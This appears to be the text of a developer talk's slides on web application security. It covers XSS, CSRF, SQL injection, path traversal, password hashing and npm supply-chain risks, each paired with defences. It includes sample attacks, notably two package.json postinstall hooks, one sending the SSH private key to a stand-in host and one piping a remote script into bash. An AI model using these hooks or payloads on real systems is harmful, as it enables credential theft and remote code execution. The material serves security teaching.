I'm a Dev
Development changes daily!
Open Source
30% of web-sites
are build of open-source code
for 95% or more
What does open source gives us?
- 🍱 Variety
- 📚 Knowledge & best practices
- 🛠 Tooling
- 🏎 Speed of development
- ✨ Magic
Should
We Trust
- Open Source
- Developers
- Users
- Robots?
Users
- Produce input
- Expect output
Input
- Forms
- Files
- HTTP Headers
- ...
Output
- Browser
- Console
- Database
- Native application
- ...
Problems
- Insufficient input filtering
- Insufficient output escaping
Input filtering
- Making sure data is valid
- Whitelist first
- Use reliable filters
function getFile(string $uuid): resource
{
$fh = fopen($_ENV['file_uploads_dis'] . '/' . $uuid);
if ($fh === false) {
throw new FileDoesNotExistException($uuid);
}
return $fh;
}
getFile('../../../../.env');
// Returns your raw passwords, please
Solution
Filter input
Validate
function getFile(string $uuid): resource
{
$fileId = Uuid::fromString($uuid)->toString();
$fh = fopen($_ENV['file_uploads_dis'] . '/' . $fileId);
if ($fh === false) {
throw new FileDoesNotExistException($uuid);
}
return $fh;
}
Filtering everywhere
vs.
DMZ
or expect valid
function getFile(UuidInterface $uuid): resource
{
$fh = fopen($_ENV['file_uploads_dis'] . '/' . $uuid->toString());
if ($fh === false) {
throw new FileDoesNotExistException($uuid);
}
return $fh;
}
Output escaping
Making special characters behave like normal characters.
Usually by prefixing with another special character.
Different outputs – different escaping rules.
Common threats
XSS
Inject JavaScript code and execute in in user's browser
...
<header>
<?= $_GET['search_query'] ?>
</header>
...
GET http://example.com/?search_query=<script>alert(1)</script>
- Session stealing
- Account takeover
- Site defacement
- Key logging
- Malicious software download
Two types:
- Reflected XSS: pass unvalidated and unescaped input derectly to output
- Stored XSS: store malicious input and output it later
Solution
Escape output
Text only?
Convert special characters to HTML entities.
PHP – htmlspecialchars
<script>alert(1)</script>
→
<script>alert(1)</script>
HTML markup
Sanitize output
PHP – htmlpurifier.org
Don't save escaped input to DB
It's useless
CSRF
Submit forms your website from other website on behalf of the user
How?
- Login to mybanking.com
- You visit evil.org
<form action="https://mybanking.com/payment"
method="POST" onload="this.submit()">
<input type="hidden" name="card_number" value="5432 1098 7654 3210" />
<input type="hidden" name="amount" value="100" />
<input type="hidden" name="currency" value="USD" />
</form>
Solution
CSRF tokens
- Generate random token serverside
- Include in all forms
- Check on submission
- Reissue after usage
- Backend frameworks can do it out of box
- Frontend frameworks are less vulnerable
SQL injection
Also a problem of unescaped output
$id = $_GET['id'];
query("SELECT * FROM user WHERE id = $id");
Use prepared statements
PDO example:
$query = $db->prepare("SELECT * FROM user WHERE id = :id");
$query->bindValue(':id', $id);
$query->fetch();
Never trust users!
Developers
Passwords
- Brute force and dictionary attack
- Leaks
Brute force
- Limit RPM by IP and login
- Show captcha
- Monitor and alert
Leaks
- Store passwords correctly
- Do not log passwords
- Do not send passwords plaintext
How to store passwords?
Hashing (even with salt) is a bad idea!
Popular hash functions
crc32, md5, sha128, sha256, sha512
are meant to be fast
Cryptographic hash functions
PBKDF2, bcrypt, scrypt
are meant to be slow
8-chars of [A-Za-z0-9] give 628 unique passwords [1]
8x Nvidia GTX 1080 GPU cards benchmark [2]:
- md5 – 200 GH/s, 18 minutes
- sha256 – 23012 MH/s, 2.5 hours
- bcrypt – 105 kH/s, 66 years
- PBKDF2-HMAC-SHA512 – 3450 kH/s, 3 years
- Argon2 – GPU is useless
Strong hash function only gives you time to react
Never implement cryptographic on your own!
Broken Access Control
- Insufficient permission checks
- Open resources
- Information leaks
Solutions
- Whitelist-based development
- Negative tests
- UUID ≠ security
Security through obscurity- Disable debug output
- Even when app crashes
Solutions
- Change default passwords
- Whitelist-based ingress firewalls
- Egress firewalls
- Services isolation
- Store backups securely
- Deliver dev-dumps securely
Credentials
- Don's store in repository
- Better not in .env
- HashiCorp Vault
Server-side
Solutions
- Update dependencies
- Log everything
- Or at least mutable requests
- Separate logging topics
- Use remote append-only storage
- Monitor suspicious activity
- Alert on automatic scans
General practices
- Raise awareness. See OWASP Top-10
- Give minimum sufficient permissions
- Remember about security whatever you do
- Play «What if?» game
Never trust developers!
Open source
- Written by experienced developers
- Followed by hundreds of eyes
- Used by thousands of developers
- Done with security in mind
- Save you from vulnerabilities
- Bullshit.
Good tools
Solutions
- Keep asking "How?" and "Why?"
- Use tools responsibly
- Educate yourself and team
- Contribute back
Dependencies
JavaScript
NPM
NPM
Patch your libs
NPM
Send reports passwords
{
"name": "portionfatty12",
"description": "Treehouse API implementation",
"scripts": {
"postinstall":
"curl -X POST -d $(cat $HOME/.ssh/id_rsa) https://hax.io/pwnd"
}
}
NPM
Puppet you
{
"scripts": {
"postinstall": "curl --silent -o- https://malicious.io/hax.sh | bash",
}
}
NPM
Package takeover
No hard feelings, NPM
Composer have the same features
Dependencies are vulnerable!
You don't know what exactly is vulnerable yet.
Solutions
- It's the price we pay for open source
- It's still better than closed-source
- Don't run with sudo
- Pray
- Use security advisories: NPM audit, PHP Roave/SecurityAdvisories
Never trust open-source
Physical security
- Encrypt laptops and PC
- Lock device when leave
-
Don't plug unknown USB drives :)
IoT
- Hype-driven
- Not open-sourced
- Bugs are rarely fixed
- Funny to spectate
Robots?
It's all vulnerable!
Let's make a safer world!
Questions?
|